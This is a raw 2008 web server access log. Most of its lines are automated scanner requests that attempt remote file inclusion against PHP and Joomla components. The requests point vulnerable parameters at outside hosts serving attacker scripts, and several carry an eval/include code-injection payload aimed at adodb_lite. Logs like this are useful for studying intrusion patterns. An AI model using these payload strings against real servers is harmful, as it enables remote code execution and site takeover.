69.61.35.163 - - [27/Aug/2008:01:24:18 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
207.58.167.158 - - [27/Aug/2008:01:24:57 -0700] "GET /logs/netcat/htmledit//index.php?DOCUMENT_ROOT=http://www.nantucketadvertiser.com/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
207.58.167.158 - - [27/Aug/2008:01:24:57 -0700] "GET /netcat/htmledit//index.php?DOCUMENT_ROOT=http://www.nantucketadvertiser.com/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
207.58.167.158 - - [27/Aug/2008:01:24:57 -0700] "GET /logs/netcat/htmledit//index.php?DOCUMENT_ROOT=http://www.nantucketadvertiser.com/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
207.58.167.158 - - [27/Aug/2008:01:24:57 -0700] "GET /netcat/htmledit//index.php?DOCUMENT_ROOT=http://www.nantucketadvertiser.com/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
83.240.164.232 - - [27/Aug/2008:01:26:07 -0700] "GET /logs/access.log/appserv/main.php?appserv_root=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
83.240.164.232 - - [27/Aug/2008:01:26:07 -0700] "GET /appserv/main.php?appserv_root=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
83.240.164.232 - - [27/Aug/2008:01:26:07 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
212.134.155.210 - - [27/Aug/2008:01:27:01 -0700] "GET /logs/access.log//errors.php?error=http://www.sldating.fr/idd.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
212.134.155.210 - - [27/Aug/2008:01:27:01 -0700] "GET //errors.php?error=http://www.sldating.fr/idd.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
212.134.155.211 - - [27/Aug/2008:01:27:01 -0700] "GET /logs//errors.php?error=http://www.sldating.fr/idd.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
65.38.169.228 - - [27/Aug/2008:01:27:56 -0700] "GET /logs/access.log%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.codeduc.cl/components/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
85.235.220.166 - - [27/Aug/2008:01:29:56 -0700] "GET /forum/index.php HTTP/1.0" 404 275 "http://www.danjtams.com/forum/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.danjtams.com"
85.235.220.166 - - [27/Aug/2008:01:29:56 -0700] "GET / HTTP/1.0" 200 763 "http://www.danjtams.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.danjtams.com"
85.235.220.166 - - [27/Aug/2008:01:29:56 -0700] "GET / HTTP/1.0" 200 763 "http://www.danjtams.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.danjtams.com"
89.218.85.18 - - [27/Aug/2008:01:30:50 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
77.221.130.3 - - [27/Aug/2008:01:31:21 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
77.221.130.3 - - [27/Aug/2008:01:31:21 -0700] "GET //include/admin.lib.inc.php?site_path=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
77.221.130.3 - - [27/Aug/2008:01:31:22 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
72.9.248.162 - - [27/Aug/2008:01:31:26 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
72.9.248.162 - - [27/Aug/2008:01:31:26 -0700] "GET //include/admin.lib.inc.php?site_path=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
72.9.248.162 - - [27/Aug/2008:01:31:27 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
69.94.97.157 - - [27/Aug/2008:01:31:38 -0700] "GET /logs/access.log/errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
69.94.97.157 - - [27/Aug/2008:01:31:38 -0700] "GET /errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
69.94.97.157 - - [27/Aug/2008:01:31:38 -0700] "GET /logs/errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
193.110.89.6 - - [27/Aug/2008:01:34:38 -0700] "GET /logs/access_080722.log//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
77.221.130.3 - - [27/Aug/2008:01:35:42 -0700] "GET //include/admin.lib.inc.php?site_path=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
216.246.46.244 - - [27/Aug/2008:01:36:12 -0700] "GET /logs/access.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
216.246.46.244 - - [27/Aug/2008:01:36:13 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
216.246.46.244 - - [27/Aug/2008:01:36:13 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
77.221.130.3 - - [27/Aug/2008:01:36:58 -0700] "GET /logs/access.log/appserv/main.php?appserv_root=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
77.221.130.3 - - [27/Aug/2008:01:36:58 -0700] "GET /appserv/main.php?appserv_root=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
77.221.130.3 - - [27/Aug/2008:01:36:59 -0700] "GET /logs/appserv/main.php?appserv_root=http://albgroup.webng.com/Id/rd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
193.110.89.6 - - [27/Aug/2008:01:37:11 -0700] "GET /logs/access.log%20//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
216.246.46.244 - - [27/Aug/2008:01:39:21 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
65.182.187.86 - - [27/Aug/2008:01:39:50 -0700] "GET /logs/access_080717.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
210.189.74.178 - - [27/Aug/2008:01:39:58 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
210.189.74.178 - - [27/Aug/2008:01:39:59 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
210.189.74.178 - - [27/Aug/2008:01:39:59 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
216.246.46.244 - - [27/Aug/2008:01:40:10 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
216.246.46.244 - - [27/Aug/2008:01:40:10 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
216.246.46.244 - - [27/Aug/2008:01:40:10 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
69.61.35.163 - - [27/Aug/2008:01:40:26 -0700] "GET /logs/access.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
69.61.35.163 - - [27/Aug/2008:01:40:27 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
69.61.35.163 - - [27/Aug/2008:01:40:31 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
216.246.46.244 - - [27/Aug/2008:01:40:47 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
204.214.80.199 - - [27/Aug/2008:01:42:52 -0700] "GET //?path%5Bdocroot%5D=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.danjtams.com"
204.214.80.199 - - [27/Aug/2008:01:42:52 -0700] "GET /logs//?path%5Bdocroot%5D=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 200 1372 "-" "libwww-perl/5.79" "www.danjtams.com"
204.214.80.199 - - [27/Aug/2008:01:42:54 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
75.126.60.130 - - [27/Aug/2008:01:44:08 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://scaneru.nm.ru/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.danjtams.com"
75.126.60.130 - - [27/Aug/2008:01:44:08 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://scaneru.nm.ru/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.danjtams.com"
75.126.60.130 - - [27/Aug/2008:01:44:08 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://scaneru.nm.ru/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.danjtams.com"
75.126.60.130 - - [27/Aug/2008:01:44:17 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://scaneru.nm.ru/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.danjtams.com"
75.126.60.130 - - [27/Aug/2008:01:44:17 -0700] "GET //config/dbutil.bck.php?confdir=http://scaneru.nm.ru/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.danjtams.com"
75.126.60.130 - - [27/Aug/2008:01:44:17 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://scaneru.nm.ru/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.danjtams.com"
75.126.60.130 - - [27/Aug/2008:01:44:18 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://scaneru.nm.ru/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.danjtams.com"
75.126.60.130 - - [27/Aug/2008:01:44:18 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://scaneru.nm.ru/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.danjtams.com"
75.126.60.130 - - [27/Aug/2008:01:44:18 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://scaneru.nm.ru/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.danjtams.com"
75.126.60.130 - - [27/Aug/2008:01:44:18 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://scaneru.nm.ru/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.danjtams.com"
75.126.60.130 - - [27/Aug/2008:01:44:18 -0700] "GET //config/dbutil.bck.php?confdir=http://scaneru.nm.ru/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.danjtams.com"
75.126.60.130 - - [27/Aug/2008:01:44:18 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://scaneru.nm.ru/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.danjtams.com"
81.115.165.75 - - [27/Aug/2008:01:45:14 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
81.115.165.75 - - [27/Aug/2008:01:45:14 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
81.115.165.75 - - [27/Aug/2008:01:45:15 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:01:45:50 -0700] "GET /logs/access.log/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:01:45:51 -0700] "GET /errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:01:45:51 -0700] "GET /logs/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.22.100.83 - - [27/Aug/2008:01:45:57 -0700] "GET /logs/access.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://acc-advertising.com/img/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
64.22.100.83 - - [27/Aug/2008:01:45:57 -0700] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://acc-advertising.com/img/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
64.22.100.83 - - [27/Aug/2008:01:45:57 -0700] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://acc-advertising.com/img/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:01:48:11 -0700] "GET /logs/access.log/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:01:48:16 -0700] "GET /logs/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:01:48:21 -0700] "GET /errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:01:48:21 -0700] "GET /logs/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:01:48:32 -0700] "GET /errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
216.246.46.244 - - [27/Aug/2008:01:50:41 -0700] "GET /logs/access_080722.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:01:51:03 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:01:51:03 -0700] "GET ///vwar/backup/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.22.100.83 - - [27/Aug/2008:01:51:42 -0700] "GET /logs/access_080722.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://acc-advertising.com/img/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
216.246.46.244 - - [27/Aug/2008:01:52:37 -0700] "GET /logs/access_080722.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
205.234.186.117 - - [27/Aug/2008:01:56:15 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
205.234.186.117 - - [27/Aug/2008:01:56:15 -0700] "GET //ashnews.php?pathtoashnews=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
205.234.186.117 - - [27/Aug/2008:01:56:16 -0700] "GET /logs//ashnews.php?pathtoashnews=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:01:57:44 -0700] "GET /logs/access.log//admin/classes/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:01:57:48 -0700] "GET //admin/classes/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:01:57:49 -0700] "GET /logs//admin/classes/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:01:58:13 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:01:58:14 -0700] "GET ///vwar/backup/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:01:58:14 -0700] "GET /logs///vwar/backup/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.22.100.83 - - [27/Aug/2008:02:00:08 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://acc-advertising.com/img/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
64.22.100.83 - - [27/Aug/2008:02:00:08 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://acc-advertising.com/img/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
64.22.100.83 - - [27/Aug/2008:02:00:08 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://acc-advertising.com/img/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
194.79.75.195 - - [27/Aug/2008:02:02:43 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aocbots.com/cms/test.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.danjtams.com"
194.79.75.195 - - [27/Aug/2008:02:02:43 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://aocbots.com/cms/test.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:02:03:57 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:02:03:57 -0700] "GET ///vwar/backup/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:02:03:58 -0700] "GET /logs///vwar/backup/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
205.234.186.117 - - [27/Aug/2008:02:04:03 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.danjtams.com"
205.234.186.117 - - [27/Aug/2008:02:04:03 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:04:07 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:04:08 -0700] "GET /phphtml.php?htmlclass_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:04:08 -0700] "GET /logs/phphtml.php?htmlclass_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:05:12 -0700] "GET /logs/access.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:05:13 -0700] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:05:13 -0700] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:07:15 -0700] "GET /logs/access.log/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:07:15 -0700] "GET /errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:07:19 -0700] "GET /logs/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
194.79.75.195 - - [27/Aug/2008:02:07:48 -0700] "GET /logs/access.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://tomromeo.com/chitoz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
194.79.75.195 - - [27/Aug/2008:02:07:48 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://tomromeo.com/chitoz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
194.79.75.195 - - [27/Aug/2008:02:07:48 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://tomromeo.com/chitoz/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
67.195.37.122 - - [27/Aug/2008:02:08:01 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.danjtams.com"
67.195.37.122 - - [27/Aug/2008:02:08:02 -0700] "GET /logs/access.log HTTP/1.0" 200 48274 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:09:59 -0700] "GET /logs/access_080722.log//index.php?DOCUMENT_ROOT=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:10:00 -0700] "GET //index.php?DOCUMENT_ROOT=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:10:03 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
202.47.247.140 - - [27/Aug/2008:02:12:20 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sajt.ba/test/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.danjtams.com"
202.47.247.140 - - [27/Aug/2008:02:12:20 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sajt.ba/test/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.danjtams.com"
